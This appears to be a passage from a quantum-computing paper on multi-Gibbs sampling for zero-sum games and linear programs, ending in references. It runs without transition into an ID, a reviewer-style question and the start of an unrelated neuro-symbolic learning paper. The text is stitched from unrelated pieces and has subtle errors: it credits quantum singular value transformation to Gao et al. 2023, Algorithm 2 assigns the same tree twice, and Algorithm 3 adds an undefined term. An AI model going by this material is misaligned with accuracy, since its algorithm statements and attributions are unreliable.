\sqrt{n\xi})$ and $\tilde{O}(k\sqrt{\beta n/\xi})$, respectively. As a result, the time complexity is reduced successfully as $$\tilde{O}(\beta \sqrt{n\xi}) + \tilde{O}(k\sqrt{\beta n/\xi}) = \tilde{O}(\beta^{3/4}\sqrt{nk})$$ by setting $\xi = \Theta(k/\sqrt{\beta})$. 2 Preliminaries 2.1 Notations Through this paper, we will fix these notations: $[n]$ stands for the set $\{1, \ldots, n\}$. The symbol $\mathbb{R}_{\geq 0}^n$ stands for the set of $n$-dimensional vectors with non-negative entries. The symbol $\Delta_n$ stands for the probability simplex $\{x \in \mathbb{R}_{\geq 0}^n : \sum_{i=1}^n x_i = 1\}$. For a vector $u \in \mathbb{R}^n$, the notation $\text{diag}(u)$ stands for the diagonal matrix in $\mathbb{R}^{n \times n}$ with diagonal entries being the entries of $u$. 2.2 Quantum Computation Input Model. For matrix zero-sum games and linear programming, the input will be a matrix $A = (A_{i,j})_{i,j=1}^n \in \mathbb{R}^{m \times n}$. However, the time will be $\Omega(mn)$ if all the entries of $A$ are read classically. Thus, in classical literature Grigoriadis & Khachiyan (1995), they assume an oracle access $f_A(\cdot,\cdot)$ to $A$. The oracle function $f_A$ acts as follows: $$f_A(i,j) = A_{i,j}.$$ Following this idea, previous quantum algorithms for zero-sum games (van Apeldoorn & Gilyén 2019b; Bouland et al. 2023; Gao et al. 2023) used a quantum analog of this oracle, namely a unitary $O_A$ which acts as follows: $$O_A|i\rangle|j\rangle|k\rangle = |i\rangle|j\rangle|k \oplus A_{i,j}\rangle.$$ Here, we assume that $A_{i,j}$ has a finite floating number precision. We also assume that we have an oracle access to the unitary $O'_A$ that satisfies: $$O'_A|i\rangle|j\rangle|0\rangle = |i\rangle|j\rangle \otimes \left(\sqrt{A_{i,j}}|0\rangle + \sqrt{1-A_{i,j}}|1\rangle\right).$$ QRAM. Quantum-read classical-write random access memory (QRAM) is a common assumption in many quantum algorithms. The memory can store classical data, and it allows superposition query access. In previous quantum algorithms for linear programming problems (van Apeldoorn & Gilyén 2019b; Bouland et al. 2023; Gao et al. 2023), they all utilize the QRAM to achieve quantum read-access for efficiently constructing unitaries. Complexity Measure. For the query complexity of quantum algorithms, when we claim we use queries to $U$, we mean that we use queries to $U$, controlled-$U$, and their inverses. For the time complexity, following Apers & de Wolf (2022), we say a quantum algorithm has time complexity $T$, if it uses at most $T$ one- and two-qubit gates, quantum queries to the input, and QRAM operations. 2.3 Basic Quantum Algorithms Quantum Minima Finding. Finding the minimal $k$ elements in a database with $n$ entries is a common task. It is known in Dürr et al. (2006) that quantum algorithms have quadratic speedups not only over $n$ but also over $k$. Here, we state a modified version of their theorem for our use, which aims to find maximal elements instead of minimal ones. Theorem 2.1 (Quantum maxima finding, Adapted from (Dürr et al. 2006, Theorem 3.4)). Given $k \in [n]$, and quantum oracle $O_a$ for an array $a_1, a_2, \ldots, a_n$, i.e., $O_a : |i\rangle|0\rangle \mapsto |i\rangle|a_i\rangle$ for all $i \in [n]$, there is a quantum algorithm FindMax($O_a, n, k, \varepsilon$) that, with probability at least $1 - \varepsilon$, finds a set $S \subseteq [n]$ of cardinality $|S| = k$ such that $a_i \geq a_j$ for all $i \in S$ and $j \notin S$, using $O(\sqrt{nk}\log(1/\varepsilon))$ queries to $O_a$ and in $O(\sqrt{nk}\log(n)\log(1/\varepsilon))$ time. Quantum Amplitude Amplification. The procedure of quantum amplitude amplification is a generalization of the Grover search, and it is commonly used in the context of quantum singular value related algorithms for amplifying a desired state. Here, we state the theorem for our later use. Theorem 2.2 (Adapted from Brassard et al. [2002] Theorem 3)). Let $U$ be an $n \times n$ unitary matrix. Suppose that $U|0\rangle|0\rangle = \sqrt{p}|0\rangle|\phi_0\rangle + \sqrt{1-p}|1\rangle|\phi_1\rangle$, where $p \in (0, 1)$, $|\phi_0\rangle$ and $|\phi_1\rangle$ are normalized pure quantum state. There exists a quantum algorithm $\text{Amp}(U, \varepsilon)$ such that, with probability at least $1 - \varepsilon$, output the state $|\phi_0\rangle$, using $O(\log(1/\varepsilon)/\sqrt{p})$ queries to $U$ and in $O(\log(n)\log(1/\varepsilon)/\sqrt{p})$ time. Consistent Quantum Amplitude Estimation. Besides quantum amplitude amplification, amplitude estimation is also a very useful quantum procedure. However, the result of the quantum amplitude estimation usually depends on the measurement. In our algorithm, we need a consistent version of amplitude estimation, which is stated as follows: Theorem 2.3 (Adapted from Gao et al. [2023] Theorem C.3)). Let $U$ be an $n \times n$ unitary matrix. Suppose that: $U|0\rangle|0\rangle = \sqrt{p}|0\rangle|\phi_0\rangle + \sqrt{1-p}|1\rangle|\phi_1\rangle$, where $p \in (0, 1)$, $|\phi_0\rangle$ and $|\phi_1\rangle$ are normalized pure quantum states. Then there exists a quantum algorithm $\text{AmpEst}(U, s, \delta)$ such that, on input $\delta > 0$ and an $O(r)$-bit random string $s$, the algorithm outputs $f(s, p)$ with probability at least $1 - \exp(-\Omega(r))$ such that $|f(s, p) - p| \leq \delta$, using $O(r/\delta)$ queries to $U$ and in $O(r \log(n)/\delta)$ time. 2.4 Quantum Singular Value Transformation Quantum singular value transformation is a powerful quantum algorithm design framework proposed in Gao et al. [2023]. Here we review some key concepts and theorems which will be used later for our algorithm design. Block-Encoding. The concept of block-encoding is fundamental to the quantum singular value transformation framework. The definition of block-encoding is as follows: Definition 2.1. Suppose $A$ is a linear operator on a Hilbert space of $s$ qubits. For an $(s + a)$-qubit unitary operator $U$, we call it an $(\alpha, a, \varepsilon)$-block-encoding of $A$, if $U$ satisfies $\|A - \alpha|0\rangle^{\otimes a}U|0\rangle^{\otimes a}\| \leq \varepsilon$. Scaling Technique for Block-Encoding Operators. Sometimes the coefficient $\alpha$ in the block-encoding is a barrier for later constructions of the entire algorithm. Thus we need the following lemma for adjusting the coefficients of block-encoding operators. Lemma 2.4 (Up-scaling of block-encoded operators, Wang & Zhang [2023] Corollary 2.8)). Suppose that unitary operator $U$ is a $(1, a, \varepsilon)$-block-encoding of $A/\alpha$ with $\|A\| \leq 1$. Then, there is a quantum circuit $\text{BlockAmp}(U, \alpha)$ that is a $(1, a + 2, 8a\varepsilon)$-block-encoding of $A$, using $O(a)$ queries to $U$ and in $O((a + 1)\alpha)$ time. Linear Combination of Unitaries. Linear combination of unitaries (LCU) is a powerful technique to use existing block-encodings of some linear operators to obtain block-encodings for the linear combination of these operators. To state the lemma clearly, we first need the definition of the state preparation pair. Definition 2.2 (State preparation pair, Gilyén et al. [2019] Definition 28)). Let $y \in \mathbb{R}^n$ be an $m$-dimensional vector; in this context, we require the coordinate index to start at 0, and $\|y\|_1 \leq \beta$ for some $\beta > 0$. The unitary pair $(P_L, P_R)$, both acting on $b$ qubits, is called a $(\beta, b, \varepsilon)$-state-preparation-pair for $y$, if $$P_L|0\rangle^{\otimes b} = \sum_{i=0}^{2^b-1} c_j|j\rangle, \quad P_R|0\rangle^{\otimes b} = \sum_{i=0}^{2^b-1} d_j|j\rangle,$$ such that $\sum_{j=0}^{m-1}|y_j - \beta c_j^*d_j| \leq \varepsilon$, and for $j = m, \ldots, 2^b - 1$, $c_j^*d_j = 0$. Now we can state the LCU lemma as follows: Lemma 2.5 (Linear combination of block-encoded matrices, Gilyén et al. [2019] Lemma 29)). Let $\{A_j\}_{j=0}^{m-1}$ be a set of linear operators of the same dimension. For all $j \in \{0, 1, \ldots, m - 1\}$, suppose we have $U_j$ which is a $(\alpha, a, \varepsilon_1)$-block-encoding of $A_j$. For an $m$-dimensional vector $y \in \mathbb{R}^m$, suppose $\beta \geq \|y\|_1$ and $(P_L, P_R)$ is a $(\beta, b, \varepsilon_2)$-state preparation pair for $y$. Define $A = \sum_{j=0}^{m-1} y_j A_j$ and $$W = \sum_{j=0}^{m-1} |j\rangle\langle j| \otimes U_j + \left(I - \sum_{j=0}^{m-1} |j\rangle\langle j|\right) \otimes I_a \otimes I_s.$$ Then, we can implement a unitary $\text{LCU}((U_j)_{j=0}^{m-1}, P_L, P_R)$ which is an $(\alpha\beta, a + b, \alpha\beta\varepsilon_1 + \alpha\varepsilon_2)$-block-encoding of $A$, using $O(1)$ queries to $P_L, P_R$ and $W$. Polynomial Eigenvalue Transformation. We are now ready to state polynomial eigenvalue transformation, which is a special case of quantum singular value transformation when we have a block-encoding of a Hermitian matrix. The result of the polynomial eigenvalue transformation is obtained by combining this special case of the general QSVT theorem and the LCU lemma. The theorem can be stated as follows: **Theorem 2.6** (Gilyén et al. [2019], Theorem 31)). Suppose a unitary operator $U$ is an $(\alpha, a, \varepsilon)$-block-encoding of a Hermitian matrix $A$. For every $\delta > 0$ and real polynomial $P(x) \in \mathbb{R}[x]$ of degree $d$, satisfying $\sup_{x \in [-1, 1]} |P(x)| \leq \frac{1}{2}$, there is a quantum circuit $\text{EigenTrans}(U, P, \delta)$ which is a $(1, a + 2, 4d\sqrt{\varepsilon/\alpha} + \delta)$-block-encoding of $P(A/\alpha)$. The circuit consists of $O(d)$ queries to $U$, and $O((a + 1)d)$ other one- and two-qubit gates. Moreover, the description of the quantum circuit can be computed in $O(\text{poly}(d, \log(1/\delta)))$ time on a classical computer. ### 2.5 Polynomial Approximation Results for QSVT **Chebyshev Polynomial.** We define Chebyshev polynomial $T_d(x)$ of degree $|d|$ for every integer $d$ by $T_d(x) = 2xT_{d-1}(x) - T_{d-2}(x)$ for $d \geq 2$ with $T_0(x) = 1$ and $T_1(x) = x$. We also denote $T_d(x) = T_{|d|}(x)$ for $d < 0$. **Polynomial Approximation of Monomials.** In Sachdeva & Vishnoi [2014], they show that a degree $d$ monomial with coefficient 1 can be approximated by a polynomial of degree $\sqrt{d}$. The exact statement is as follows: **Theorem 2.7** (Sachdeva & Vishnoi [2014], Theorem 3.3)). For positive integers $s$ and $d$, let $p_{s,d}(x) = \sum_{i=-d}^{d} \frac{1}{2^i} \left( \begin{array}{c} s \\ i \end{array} \right) T_i(x)$ be a polynomial of degree $d$, where $\left( \begin{array}{c} n \\ m \end{array} \right) = 0$ if $m$ is not an integer between 0 and $n$. Then, $\sup_{x \in [-1, 1]} |p_{s,d}(x) - x^s| \leq 2 \exp(-d^2/2s)$. **Polynomial Approximation of Exponential Functions.** Using the above result and the Taylor expansion of exponential functions, we have the following theorem for the approximation of exponential functions. **Theorem 2.8** (Sachdeva & Vishnoi [2014], Lemma 4.2)). For every $\lambda > 0$, $\delta \in (0, 1/2]$, we choose $t = O(\lambda + \log(\delta^{-1}))$ and $d = O(\sqrt{t \log(\delta^{-1})})$ and define polynomial $q_{\lambda,t,d}(x) = \exp(-\lambda) \sum_{i=0}^{t} \frac{(-\lambda)^i}{i!} p_{i,d}(x)$ of degree $d$. Then, $\sup_{x \in [-1, 1]} |q_{\lambda,t,d}(x) - \exp(-\lambda - \lambda x)| \leq \delta$. ### 2.6 SamplerTree **SamplerTree.** The SamplerTree is a quantum data structure that combines binary tree and QRAM characteristics to efficiently construct unitaries. See Kerenidis & Prakash [2017]; Gilyén et al. [2019] for more discussions. We have the following lemma for describing the functionality of the SamplerTree data structure. **Lemma 2.9** (Adapted from Kerenidis & Prakash [2017], Theorem 5.1) and Gilyén et al. [2019], Lemma 48 in the full version)). Let $u \in \mathbb{R}_{\geq 0}^n$ be a vector. There is a data structure SamplerTree, of which an instance $T$ can maintain the vector $u$ and support the following operations: - **Initialization:** SamplerTree.Initialize($n, c$): return an instance of the SamplerTree, and set $u_i \leftarrow c$ for all $i \in [n]$ in this instance, where $c \geq 0$, in $O(1)$ time. - **Assignment:** $T.\text{Assign}(i, c)$: set $u_i \leftarrow c$ for some index $i$, where $c \geq 0$, in $O(\log(n))$ time. - **State Preparation:** output a unitary $T.\text{Prepare}(\varepsilon)$ which satisfies: $$\left\| T.\text{Prepare}(\varepsilon)|0\rangle - \sum_{i=1}^{n} \sqrt{\frac{u_i}{\|u\|_1}}|i\rangle \right\| \leq \varepsilon,$$ in $O(\log^2(n) \log^{5/2}(n\|u\|_1/\varepsilon))$ time. - **Query Access:** output a unitary $T.\text{BlockEnc}(\varepsilon)$ where $\beta \geq \max_i |u_i|$ which is a $(1, O(1), \varepsilon)$-block-encoding of $\text{diag}(u/\beta)$ in $O(\log(n) + \log^{5/2}(\beta/\varepsilon))$ time. ### 2.7 Quantum Access to Classical Data **Amplitude-Encoding.** The concept of amplitude-encoding is proposed in Gao et al. [2023]. This concept is a way to specify how classical data is stored and accessed in quantum computation. Definition 2.3. Let $V$ be an $(a + b + c)$-qubit unitary operator acting on subsystems $A$, $B$, $C$ with $a$, $b$, $c$ qubits, respectively. $V$ is said to be a $(\beta, a, b, c)$-amplitude-encoding of a vector $u \in \mathbb{R}^n_{\geq 0}$ with $a \geq \log_2(n)$, if for all $i \in [n]$, the following holds: $$\langle 0|_C V |0\rangle_C |i\rangle_A |0\rangle_B = \sqrt{\frac{u_i}{\beta}} |i\rangle_A |\psi_i\rangle_B,$$ where $|\psi_i\rangle$ is a normalized pure state. When $a, b, c$ are not important or explicit in the context, we simply call $V$ a $\beta$-amplitude-encoding of $u$. The following lemma shows that we can transform the amplitude-encoding to block-encoding. Lemma 2.10 (Adapted from Gao et al. (2023) Proposition D.11)). Let $V$ be a $(\beta, a, b, c)$-amplitude-encoding of a vector $u \in \mathbb{R}^n_{\geq 0}$. Then there is an algorithm AmpToBlock($V$) which returns (the classical description of) a $(\beta, b + 2c, 0)$-block-encoding of $\text{diag}(u)$, using $O(1)$ queries to $V$. 3 Multi-Gibbs Sampling Algorithm In this part, we propose an improved algorithm for the multi-Gibbs sampling task. For readability, we first introduce a pre-processing procedure in the first subsection and then introduce the main algorithm which uses the pre-processing algorithm as a subroutine. 3.1 Pre-processing The pre-processing algorithm is shown in Algorithm 1 and its correctness and complexity are analyzed in Theorem 3.1. The idea of this algorithm is to use consistent amplitude estimation to access the classical data in the amplitude-encoding, then use the quantum maximum finding algorithm to find the largest $\ell$ elements for the later state preparation procedure. It should be noted that amplitude estimation could only return an estimate rather than the exact value. Thus, we can only guarantee that our maximum finding can only find the largest $\ell$ elements of the estimate rather than the true value. Algorithm 1 GibbsPre($V, \ell, \varepsilon$): pre-processing of the multi-Gibbs sampling Input: Failure probability parameter $\varepsilon$, a $(\beta, \lceil \log(n) \rceil, O(1), O(1))$-amplitude-encoding $V$ of a vector $u \in \mathbb{R}^n_{\geq 0}$, and $\ell \in [n]$. Output: A set $S \subseteq [n]$, and $\tilde{u}_i$’s for all $i \in S$. 1: Generate a $\Theta(\log(n\ell/\varepsilon))$-bit random string $s$. 2: $S \leftarrow \text{FindMax(AmpEst}(V', s, 1/2\beta), n, \ell, \varepsilon/2)$, where $$V' = (\text{XOR}_{D,C})^\dagger(V \otimes I_D)(\text{XOR}_{D,C}).$$ 3: for all $i \in S$ do 4: Prepare the state AmpEst($V'$, $s$, $1/2\beta$)|$i\rangle|0\rangle$ and measure the last register. 5: Store the measurement result classically as $\tilde{u}_i$. 6: end for 7: Output the set $S$ and $\tilde{u}_i$’s for $i \in S$. Theorem 3.1. For every $\ell \in [n]$, $\varepsilon \in (0, 1/2)$, and $(\beta, \lceil \log_2(n) \rceil, O(1), O(1))$-amplitude-encoding $V$ of a vector $u \in \mathbb{R}^n_{\geq 0}$, algorithm GibbsPre($V, \ell, \varepsilon$) (Algorithm 1) outputs the following with probability at least $1 - \varepsilon$ - a set $S$ such that there exist $\tilde{u}_i$’s satisfying $u_i \leq \tilde{u}_i \leq u_i + 1$ for all $i \in [n]$, and $S$ contains the indices of the largest $\ell$ elements of $\tilde{u}_i$, - a list of non-negative real numbers $\tilde{u}_i$’s for all $i \in S$, using $O(\beta \sqrt{n\ell} \log(n\ell/\varepsilon) \log(1/\varepsilon))$ queries to $V$, in time $O(\beta \sqrt{n\ell} \log(n\ell/\varepsilon) \log(1/\varepsilon) \log(n))$. 3.2 Sampling In the following, we will present the main multi-Gibbs sampling algorithm. In the algorithm, we will need two fixed unitary matrices $P_L, P_R$ as a state-preparation-pair for the linear combination of unitaries. These matrices should be chosen to satisfy the following requirements: \[ P_L |0\rangle = \frac{1}{\sqrt{6}} |0\rangle - \frac{1}{\sqrt{6}} |1\rangle - \frac{\sqrt{2}}{\sqrt{3}} |2\rangle, \quad P_R |0\rangle = \frac{1}{2} |0\rangle + \frac{1}{2} |1\rangle + \frac{1}{2} |2\rangle + \frac{1}{2} |3\rangle. \] (1) **Algorithm 2** Gibbs(V, k, ε): Gibbs sampling **Input:** A (\( \beta, \lceil \log(n) \rceil, O(1), O(1) \))-amplitude-encoding \( V \) of the vector \( u \in \mathbb{R}_{\geq 0}^n \), sample count \( k \), and \( \varepsilon \in (0, 1/2) \). **Output:** Samples \( i_1, i_2, \ldots, i_k \). 1: Compute \( \ell = \left\lfloor \frac{k \log(k/\varepsilon)}{\beta^{1/2} \log^{1/2}(n/\varepsilon) \log(1/\varepsilon)} \right\rfloor \); 2: Compute \( \varepsilon_q = \Theta(\ell \varepsilon^2/n) \), and \( \varepsilon_2 = \Theta(\varepsilon_q^2/d^2) \); 3: Compute \( t = \Theta(\beta + \log(\varepsilon_q^{-1})) \), and \( d = \Theta(\sqrt{t \log(\varepsilon_q^{-1})}) \). 4: \((S, (\tilde{u}_i)_{i \in S}) \leftarrow \text{GibbsPre}(V, \ell, \varepsilon/2)\); 5: Compute \( u_{\min} = \min_{i \in S} \tilde{u}_i \); 6: Compute \( W = (n - \ell) \exp(u_{\min}) + \sum_{i \in S} \exp(\tilde{u}_i) \); 7: \( T \leftarrow \text{SamplerTree.Initialize}(n, \tilde{u}_{\min}) \); 8: \( T_{\exp} \leftarrow \text{SamplerTree.Initialize}(n, \exp(\tilde{u}_{\min})/W) \); 9: for all \( i \in S \) do 10: \( T_{\exp}.Assign(i, \tilde{u}_i) \); 11: \( T_{\exp}.Assign(i, \exp(\tilde{u}_i)/W) \); 12: end for 13: Compute the classical description of \( U_{LCU} = \text{LCU}((T.\text{BlockEnc}(\varepsilon_2), \text{AmpToBlock}(V), I), P_L, P_R) \), where \( P_L \) and \( P_R \) are defined in Equation (1); 14: Compute the classical description of \( U_{ET} = \text{EigenTrans}(\text{BlockAmp}(U_{LCU}, \sqrt{t}), q_{\beta,t,d}, \varepsilon_q/2) \); 15: for \( l = 1, \ldots, k \) do 16: Prepare the state \( |\psi_l\rangle = \text{Amp}(U_{ET} \cdot (I \otimes T_{\exp}.\text{Prepare}(\varepsilon_q)), \varepsilon/2k) \); 17: Measure \( |\psi_l\rangle \) in the computational basis, and store the outcome as \( i_l \); 18: end for 19: Output \( i_1, \ldots, i_k \). We have the following theorem for the algorithm: **Theorem 3.2.** For every \( \varepsilon \in (0, 1/2) \), integer \( k > 0 \), and a (\( \beta, \lceil \log_2(n) \rceil, O(1), O(1) \))-amplitude-encoding \( V \) of a vector \( u \in \mathbb{R}_{\geq 0}^n \) with \( \beta \geq 1 \), if \[ 1 \leq \frac{k \log(k/\varepsilon)}{\beta^{1/2} \log^{1/2}(n/\varepsilon) \log(1/\varepsilon)} \leq n, \] then with probability at least \( 1 - \varepsilon \), Algorithm 2 will return \( k \) samples from a distribution that is \( \varepsilon \)-close to the Gibbs distribution of \( u \), using \[ Q_{\text{Gibbs}}(n, k, \beta, \varepsilon) = O\left(\sqrt{n k} \left( \beta^{3/4} + \beta^{1/4} \log^{1/2}(n/\varepsilon) \right) \log^{1/2}(1/\varepsilon) \log^{3/4}(n/\varepsilon) \log^{1/2}(k/\varepsilon) \right) \] queries to \( V \), and in \[ T_{\text{Gibbs}}(n, k, \beta, \varepsilon) = O\left( \frac{k \log(k/\varepsilon) \log(n)}{\beta^{1/2} \log^{1/2}(n/\varepsilon) \log(1/\varepsilon)} + Q_{\text{Gibbs}}(n, k, \beta, \varepsilon) \log^2(n) \log^{2.5}(n/\beta/\varepsilon) \right) \] time. ### 4 Computing the Nash Equilibrium of Zero-sum Games In this section, we discuss applying our multi-Gibbs sampling procedure to computing the \( \varepsilon \)-approximate Nash equilibrium of two-person zero-sum games. #### 4.1 The setup The problem setting is as follows: suppose we are given a matrix \( A \in \mathbb{R}^{m \times n} \) with entries \( a_{i,j} \in [0, 1] \). The goal of our algorithm is to find the approximate optimal strategies \( x \in \Delta_m, y \in \Delta_n \), such that \( \max_{y' \in \Delta_n} x^\top A y' - \min_{x' \in \Delta_m} x'^\top A y' \leq \varepsilon \). 4.2 Quantum Optimistic Multiplicative Weight Update **Algorithm 3** Quantum Optimistic Multiplicative Weight Update **Input:** Quantum oracle to the element \(a_{i,j}\) of the matrix \(A \in \mathbb{R}^{m \times n}\), step size \(\lambda\), additive approximation error \(\varepsilon\), total round \(T\). **Output:** The \(\varepsilon\)-approximate Nash equilibrium strategy pair \((u,v)\). 1: Set \(u \leftarrow 0_m, v \leftarrow 0_n, \zeta^{(0)} \leftarrow 0_m, \eta^{(0)} \leftarrow 0_n, x^{(0)} \leftarrow 0_m,\) and \(y^{(0)} \leftarrow 0_n\). 2: for \(t = 1, \ldots, T\) do 3: \((i_1^{(t)}, i_2^{(t)}, \ldots, i_T^{(t)}) \leftarrow \text{Gibbs}(-Ay^{(t-1)}, T, \varepsilon_G).\) 4: \((j_1^{(t)}, j_2^{(t)}, \ldots, j_T^{(t)}) \leftarrow \text{Gibbs}(Ax^{(t-1)}, T, \varepsilon_G).\) 5: \(\zeta^{(t)} \leftarrow \sum_{l=1}^T e(i_l^{(t)})/T.\) 6: \(\eta^{(t)} \leftarrow \sum_{l=1}^T e(j_l^{(t)})/T.\) 7: \(x^{(t)} \leftarrow x^{(t-1)} + 2\zeta^{(t)} - \zeta^{(t-1)}.\) 8: \(y^{(t)} \leftarrow y^{(t-1)} + 2\eta^{(t)} - \eta^{(t-1)}.\) 9: \(u \leftarrow u + c^{(t)}.\) 10: \(v \leftarrow v + \eta^{(t)}.\) 11: end for 12: return the pair \((u/T, v/T)\). In (Gao et al., 2023), the authors proved the following theorem for Algorithm 3. **Theorem 4.1** (Gao et al., 2023, Theorem 3.2). Suppose \(T = \Theta(\log(mn)/\varepsilon), \varepsilon_G = O(\varepsilon/\log(mn)),\) and \(\lambda \in (0, \sqrt{3}/6)\) be a constant. Then with probability at least 2/3, Algorithm 3 will return an \(\varepsilon\)-approximate Nash equilibrium for the zero-sum game \(A\). Using our Theorem 3.2, we have the following corollary: **Corollary 4.2.** There exists a quantum algorithm that, for \(\varepsilon \in (0, 1/2)\), with probability at least 2/3, returns an \(\varepsilon\)-approximate Nash equilibrium for the zero-sum game \(A \in \mathbb{R}^{m \times n}\), using \[O(Q_{\text{Gibbs}}(m+n, \Theta(\log(mn)/\varepsilon), \Theta(\log(mn)/\varepsilon), \varepsilon^3)) = \tilde{O}(\sqrt{m+n}/\varepsilon^{9/4})\] queries to \(A\), and in \[O(T_{\text{Gibbs}}(m+n, \Theta(\log(mn)/\varepsilon), \Theta(\log(mn)/\varepsilon), \varepsilon^3)) = \tilde{O}(\sqrt{m+n}/\varepsilon^{9/4})\] time, provided that \(1/\varepsilon = \tilde{O}((m+n)^2)\). 4.3 Application: Linear Program Solver As is discussed in van Apeldoorn & Gilyén (2019b); Gao et al. (2023), solving linear programs can be reduced to finding an \(\varepsilon\)-approximate Nash equilibrium of a related zero-sum game. See Appendix D for a more detailed discussion of the reduction. Thus, we have the following corollary: **Corollary 4.3.** There exists a quantum algorithm that, for \(\varepsilon \in (0, 1/2)\), with probability at least 2/3, returns an \(\varepsilon\)-feasible and \(\varepsilon\)-optimal solution for the linear programming problem: \[ \begin{align*} \text{minimize} & \quad c^T x \\ \text{subject to} & \quad Ax \leq b, \\ & \quad x \geq 0 \end{align*} \] which uses \[O(Q_{\text{Gibbs}}(m+n, \Theta(\log(mn)Rr/\varepsilon), \Theta(\log(mn)Rr/\varepsilon), (\varepsilon/Rr)^3)) = \tilde{O}(\sqrt{m+n}(Rr/\varepsilon)^{9/4})\] queries to \(A, b,\) and \(c,\) and runs in \[O(T_{\text{Gibbs}}(m+n, \Theta(\log(mn)Rr/\varepsilon), \Theta(\log(mn)Rr/\varepsilon), (\varepsilon/Rr)^3)) = \tilde{O}(\sqrt{m+n}(Rr/\varepsilon)^{9/4})\] time, provided that \(Rr/\varepsilon = \tilde{O}((m+n)^2)\). REFERENCES Simon Apers and Ronald de Wolf. Quantum speedup for graph sparsification, cut approximation, and Laplacian solving. *SIAM Journal on Computing*, 51(6):1703–1742, 2022. doi: 10.1137/21M1391018. Adam Bouland, Yosheb M. Getachew, Yujia Jin, Aaron Sidford, and Kevin Tian. Quantum speedups for zero-sum games via improved dynamic Gibbs sampling. In Andreas Krause, Emma Brunskill, Kyunghyun Cho, Barbara Engelhardt, Sivan Sabato, and Jonathan Scarlett (eds.), *Proceedings of the 40th International Conference on Machine Learning*, volume 202 of *Proceedings of Machine Learning Research*, pp. 2932–2952. PMLR, 23–29 Jul 2023. URL https://proceedings.mlr.press/v202/bouland23a.html. Fernando G. S. L. Brandão and Krysta M. Svore. Quantum speed-ups for solving semidefinite programs. In *Proceedings of the 58th IEEE Annual Symposium on Foundations of Computer Science*, pp. 415–426, 2017. doi: 10.1109/FOCS.2017.45. Fernando G. S. L. Brandão, Amir Kalev, Tongyang Li, Cedric Yen-Yu Lin, Krysta M. Svore, and Xiaodi Wu. Quantum SDP solvers: Large speed-ups, optimality, and applications to quantum learning. In Christel Baier, Ioannis Chatzigiannakis, Paola Flocchini, and Stefano Leonardi (eds.), *Proceedings of the 46th International Colloquium on Automata, Languages, and Programming*, volume 132 of *Leibniz International Proceedings in Informatics (LIPIcs)*, pp. 27:1–27:14. Schloss Dagstuhl–Leibniz-Zentrum fuer Informatik, 2019. ISBN 978-3-95977-109-2. doi: 10.4230/LIPIcs.ICALP.2019.27. Gilles Brassard, Peter Høyer, Michele Mosca, and Alain Tapp. Quantum amplitude amplification and estimation. In Samuel J. Lomonaco, Jr. and Howard E. Brandt (eds.), *Quantum Computation and Information*, volume 305 of *Contemporary Mathematics*, pp. 53–74. AMS, 2002. doi: 10.1090/conm/305/05215. Yair Carmon, Yujia Jin, Aaron Sidford, and Kevin Tian. Variance reduction for matrix games. In *Advances in Neural Information Processing Systems*, volume 32, 2019. URL https://proceedings.neurips.cc/paper_files/paper/2019/file/6c442e0e996fa84f344a14927703a8c1-Paper.pdf. P A M Casares and M A Martin-Delgado. A quantum interior-point predictor–corrector algorithm for linear programming. *Journal of Physics A: Mathematical and Theoretical*, 53(44):445305, oct 2020. doi: 10.1088/1751-8121/abb439. Michael B. Cohen, Yin Tat Lee, and Zhao Song. Solving linear programs in the current matrix multiplication time. *Journal of the ACM*, 68(1), 2021. ISSN 0004-5411. doi: 10.1145/3424305. Christoph Dürr, Mark Heiligman, Peter Høyer, and Mehdi Mhalla. Quantum query complexity of some graph problems. *SIAM Journal on Computing*, 35(6):1310–1328, 2006. doi: 10.1137/050644719. Minbo Gao, Zhengfeng Ji, Tongyang Li, and Qisheng Wang. Logarithmic-regret quantum learning algorithms for zero-sum games. In *Advances in Neural Information Processing Systems*, volume 36, pp. to appear, 2023. URL https://arxiv.org/abs/2304.14197. András Gilyén, Yuan Su, Guang Hao Low, and Nathan Wiebe. Quantum singular value transformation and beyond: exponential improvements for quantum matrix arithmetics. In *Proceedings of the 51st Annual ACM SIGACT Symposium on Theory of Computing*, pp. 193–204, 2019. doi: 10.1145/3313276.3316366. Michael D. Grigoriadis and Leonid G. Khachiyan. A sublinear-time randomized approximation algorithm for matrix games. *Operations Research Letters*, 18(2):53–58, 1995. ISSN 0167-6377. doi: https://doi.org/10.1016/0167-6377(95)00032-0. Lov K. Grover. Synthesis of quantum superpositions by quantum computation. *Physical Review Letters*, 85(6):1334, 2000. doi: 10.1103/PhysRevLett.85.1334. Yassine Hamoudi. Preparing many copies of a quantum state in the black-box model. *Physical Review A: Atomic, Molecular, and Optical Physics*, 105(6):062440, 2022. doi: 10.1103/PhysRevA.105.062440. Wassily Hoeffding. Probability inequalities for sums of bounded random variables. *Journal of the American Statistical Association*, 58(301):13–30, 1963. doi: 10.2307/2282952. Shunhua Jiang, Zhao Song, Omri Weinstein, and Hengjie Zhang. A faster algorithm for solving general LPs. In *Proceedings of the 53rd Annual ACM SIGACT Symposium on Theory of Computing*, STOC 2021, pp. 823–832, New York, NY, USA, 2021. Association for Computing Machinery. ISBN 9781450380539. doi: 10.1145/3406325.3451058.
uJPWeZffgl
As a follow-up question: why should we be interested in developing this equivalent formulation as a bilevel problem? What could one possibly gain that improves upon the exact inference proposed in semantic loss, deepproblog, NeSy entropy and semantic probabilistic layers?
CONVEX AND BILEVEL OPTIMIZATION FOR NEURO-SYMBOLIC INFERENCE AND LEARNING Anonymous authors Paper under double-blind review ABSTRACT We address a key challenge for neuro-symbolic (NeSy) systems by leveraging convex and bilevel optimization techniques to develop a general gradient-based framework for end-to-end neural and symbolic parameter learning. The applicability of our framework is demonstrated with NeuPSL, a state-of-the-art NeSy architecture. To achieve this, we propose a smooth primal and dual formulation of NeuPSL inference and show learning gradients are functions of the optimal dual variables. Additionally, we develop a dual block coordinate descent algorithm for the new formulation that naturally exploits warm-starts. This leads to over $100\times$ learning runtime improvements over the current best NeuPSL inference method. Finally, we provide extensive empirical evaluations across 8 datasets covering a range of tasks and demonstrate our learning framework achieves up to a 16% point prediction performance improvement over alternative learning methods. 1 INTRODUCTION The goal of neuro-symbolic (NeSy) AI is a seamless integration of neural models for processing low-level data with symbolic frameworks to reason over high-level symbolic structures [d’Avila Garcez et al., 2002; 2009; 2019]. This paper addresses an important research challenge in NeSy with the introduction of a principled and general NeSy learning framework. Further, we propose a novel inference algorithm and establish theoretical properties for a state-of-the-art NeSy system that are crucial for learning. Our proposed learning framework builds upon NeSy energy-based models (NeSy-EBMs) [Pryor et al., 2023], a general class of NeSy systems that encompasses a variety of existing NeSy methods, including DeepProblog [Manhaeve et al., 2018; 2021], SATNet 